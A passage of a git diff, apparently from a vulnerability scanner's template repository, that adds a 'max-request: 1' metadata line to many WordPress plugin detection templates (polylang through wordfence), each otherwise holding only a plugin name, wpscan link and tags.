+ max-request: 1
plugin_namespace: pixelyoursite
wpscan: https://wpscan.com/plugin/pixelyoursite
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/polylang/
metadata:
+ max-request: 1
plugin_namespace: polylang
wpscan: https://wpscan.com/plugin/polylang
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/popup-builder/
metadata:
+ max-request: 1
plugin_namespace: popup-builder
wpscan: https://wpscan.com/plugin/popup-builder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/popup-maker/
metadata:
+ max-request: 1
plugin_namespace: popup-maker
wpscan: https://wpscan.com/plugin/popup-maker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/post-smtp/
metadata:
+ max-request: 1
plugin_namespace: post-smtp
wpscan: https://wpscan.com/plugin/post-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index 56d2e4efcd..829edad042 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/post-types-order/
metadata:
+ max-request: 1
plugin_namespace: post-types-order
wpscan: https://wpscan.com/plugin/post-types-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/premium-addons-for-elementor/
metadata:
+ max-request: 1
plugin_namespace: premium-addons-for-elementor
wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/pretty-link/
metadata:
+ max-request: 1
plugin_namespace: pretty-link
wpscan: https://wpscan.com/plugin/pretty-link
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
+ max-request: 1
plugin_namespace: really-simple-captcha
wpscan: https://wpscan.com/plugin/really-simple-captcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-ssl/
metadata:
+ max-request: 1
plugin_namespace: really-simple-ssl
wpscan: https://wpscan.com/plugin/really-simple-ssl
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/redirection/
metadata:
+ max-request: 1
plugin_namespace: redirection
wpscan: https://wpscan.com/plugin/redirection
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/redux-framework/
metadata:
+ max-request: 1
plugin_namespace: redux-framework
wpscan: https://wpscan.com/plugin/redux-framework
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/regenerate-thumbnails/
metadata:
+ max-request: 1
plugin_namespace: regenerate-thumbnails
wpscan: https://wpscan.com/plugin/regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/safe-svg/
metadata:
+ max-request: 1
plugin_namespace: safe-svg
wpscan: https://wpscan.com/plugin/safe-svg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/seo-by-rank-math/
metadata:
+ max-request: 1
plugin_namespace: seo-by-rank-math
wpscan: https://wpscan.com/plugin/seo-by-rank-math
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/sg-cachepress/
metadata:
+ max-request: 1
plugin_namespace: sg-cachepress
wpscan: https://wpscan.com/plugin/sg-cachepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/sg-security/
metadata:
+ max-request: 1
plugin_namespace: sg-security
wpscan: https://wpscan.com/plugin/sg-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 656ad7dfe5..648ee176ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/shortcodes-ultimate/
metadata:
+ max-request: 1
plugin_namespace: shortcodes-ultimate
wpscan: https://wpscan.com/plugin/shortcodes-ultimate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/shortpixel-image-optimiser/
metadata:
+ max-request: 1
plugin_namespace: shortpixel-image-optimiser
wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/simple-custom-post-order/
metadata:
+ max-request: 1
plugin_namespace: simple-custom-post-order
wpscan: https://wpscan.com/plugin/simple-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/siteguard/
metadata:
+ max-request: 1
plugin_namespace: siteguard
wpscan: https://wpscan.com/plugin/siteguard
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/siteorigin-panels/
metadata:
+ max-request: 1
plugin_namespace: siteorigin-panels
wpscan: https://wpscan.com/plugin/siteorigin-panels
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/smart-slider-3/
metadata:
+ max-request: 1
plugin_namespace: smart-slider-3
wpscan: https://wpscan.com/plugin/smart-slider-3
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/so-widgets-bundle/
metadata:
+ max-request: 1
plugin_namespace: so-widgets-bundle
wpscan: https://wpscan.com/plugin/so-widgets-bundle
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
metadata:
+ max-request: 1
plugin_namespace: stops-core-theme-and-plugin-updates
wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/sucuri-scanner/
metadata:
+ max-request: 1
plugin_namespace: sucuri-scanner
wpscan: https://wpscan.com/plugin/sucuri-scanner
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/svg-support/
metadata:
+ max-request: 1
plugin_namespace: svg-support
wpscan: https://wpscan.com/plugin/svg-support
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
+ max-request: 1
plugin_namespace: table-of-contents-plus
wpscan: https://wpscan.com/plugin/table-of-contents-plus
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/tablepress/
metadata:
+ max-request: 1
plugin_namespace: tablepress
wpscan: https://wpscan.com/plugin/tablepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/taxonomy-terms-order/
metadata:
+ max-request: 1
plugin_namespace: taxonomy-terms-order
wpscan: https://wpscan.com/plugin/taxonomy-terms-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/the-events-calendar/
metadata:
+ max-request: 1
plugin_namespace: the-events-calendar
wpscan: https://wpscan.com/plugin/the-events-calendar
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/themeisle-companion/
metadata:
+ max-request: 1
plugin_namespace: themeisle-companion
wpscan: https://wpscan.com/plugin/themeisle-companion
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/tinymce-advanced/
metadata:
+ max-request: 1
plugin_namespace: tinymce-advanced
wpscan: https://wpscan.com/plugin/tinymce-advanced
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/translatepress-multilingual/
metadata:
+ max-request: 1
plugin_namespace: translatepress-multilingual
wpscan: https://wpscan.com/plugin/translatepress-multilingual
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
metadata:
+ max-request: 1
plugin_namespace: ultimate-addons-for-gutenberg
wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index b7ad16e281..48481fde3b 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/under-construction-page/
metadata:
+ max-request: 1
plugin_namespace: under-construction-page
wpscan: https://wpscan.com/plugin/under-construction-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 10fd071b0b..b34d196268 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/updraftplus/
metadata:
+ max-request: 1
plugin_namespace: updraftplus
wpscan: https://wpscan.com/plugin/updraftplus
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/use-any-font/
metadata:
+ max-request: 1
plugin_namespace: use-any-font
wpscan: https://wpscan.com/plugin/use-any-font
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/user-role-editor/
metadata:
+ max-request: 1
plugin_namespace: user-role-editor
wpscan: https://wpscan.com/plugin/user-role-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/velvet-blues-update-urls/
metadata:
+ max-request: 1
plugin_namespace: velvet-blues-update-urls
wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/w3-total-cache/
metadata:
+ max-request: 1
plugin_namespace: w3-total-cache
wpscan: https://wpscan.com/plugin/w3-total-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/webp-converter-for-media/
metadata:
+ max-request: 1
plugin_namespace: webp-converter-for-media
wpscan: https://wpscan.com/plugin/webp-converter-for-media
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/webp-express/
metadata:
+ max-request: 1
plugin_namespace: webp-express
wpscan: https://wpscan.com/plugin/webp-express
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/widget-importer-exporter/
metadata:
+ max-request: 1
plugin_namespace: widget-importer-exporter
wpscan: https://wpscan.com/plugin/widget-importer-exporter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woo-cart-abandonment-recovery/
metadata:
+ max-request: 1
plugin_namespace: woo-cart-abandonment-recovery
wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woo-checkout-field-editor-pro/
metadata:
+ max-request: 1
plugin_namespace: woo-checkout-field-editor-pro
wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woo-variation-swatches/
metadata:
+ max-request: 1
plugin_namespace: woo-variation-swatches
wpscan: https://wpscan.com/plugin/woo-variation-swatches
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-gateway-paypal-express-checkout
wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-stripe/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-gateway-stripe
wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 1d41b4ec2c..54dce49b42 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-payments/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-payments
wpscan: https://wpscan.com/plugin/woocommerce-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-paypal-payments/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-paypal-payments
wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-pdf-invoices-packing-slips
wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-services/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-services
wpscan: https://wpscan.com/plugin/woocommerce-services
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce/
metadata:
+ max-request: 1
plugin_namespace: woocommerce
wpscan: https://wpscan.com/plugin/woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
